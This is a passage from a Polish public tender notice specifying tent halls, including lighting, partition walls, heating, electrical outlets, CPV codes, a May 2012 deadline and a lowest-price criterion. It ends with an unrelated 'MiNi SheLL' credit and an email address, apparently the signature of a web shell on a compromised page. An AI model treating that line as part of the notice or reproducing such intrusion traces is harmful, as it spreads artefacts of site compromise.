	preferowane oświetlenie halogenowe - dopuszcza się możliwość zastosowania oświetlenia jarzeniowego;
	nie mniej niż 20 punktów świetlnych rozmieszczonych symetrycznie 
w dwóch rzędach po nie mniej niż 10 punktów w każdym z nich. 
4)	Rodzaj, typ, kolor, wymiary i ilość ścianek działowych do wydzielenia miejsc pracy w 3 halach namiotowych:
	ścianki działowe w systemie oktagonalnym (ośmiokątnym);
	profil aluminiowy np. OCTANORM lub odpowiednik;
	ścianki pełne z płyt np. HDF obustronnie lakierowanej w kolorze białym;
	wymiary ścianek: ścianka o szerokości 1m, wysokość 2m;
	ilość zgodnie z oddzielnie przesłanym planem rozmieszczenia tj.:
-     164 ścianek w hali namiotowej nr 1;
-     124 ścianek w hali namiotowej nr 2;
-     123 ścianek w hali namiotowej nr 3.
5)	Rodzaj ogrzewania hal namiotowych, wysokość temperatury wewnątrz hal namiotowych w dzień i w nocy oraz sposób jego rozliczenia:
	ogrzewanie hal - nagrzewnice;
	temperatura wewnątrz hal w dzień i w nocy 20oC.
6)	Instalacja elektryczna rozprowadzona w halach namiotowych umożliwiająca podłączenie zainstalowanego oświetlenia, 2 szt. nagrzewnic powietrza oraz:
-     100 odbiorników elektrycznych w hali namiotowej nr 1;
-     133 odbiorników elektrycznych w hali namiotowej nr 2;
-     134 odbiorników elektrycznych w hali namiotowej nr 3;
-      59 odbiorników elektrycznych w hali namiotowej nr 4.
7)	Odległość do skrzynki z prądem do miejsca rozstawienia hal namiotowych - 35 m.
8)	Obsługa hal namiotowych, nagrzewnic oraz instalacji elektrycznej 
i oświetleniowej po stronie wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.20.00-2, 39.52.25.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com